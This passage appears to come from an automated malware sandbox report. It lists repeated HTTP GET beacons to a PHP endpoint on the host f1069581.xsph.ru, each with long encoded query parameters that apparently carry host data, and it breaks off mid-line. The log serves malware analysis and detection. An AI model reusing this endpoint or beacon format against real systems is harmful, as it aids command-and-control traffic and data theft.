            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET 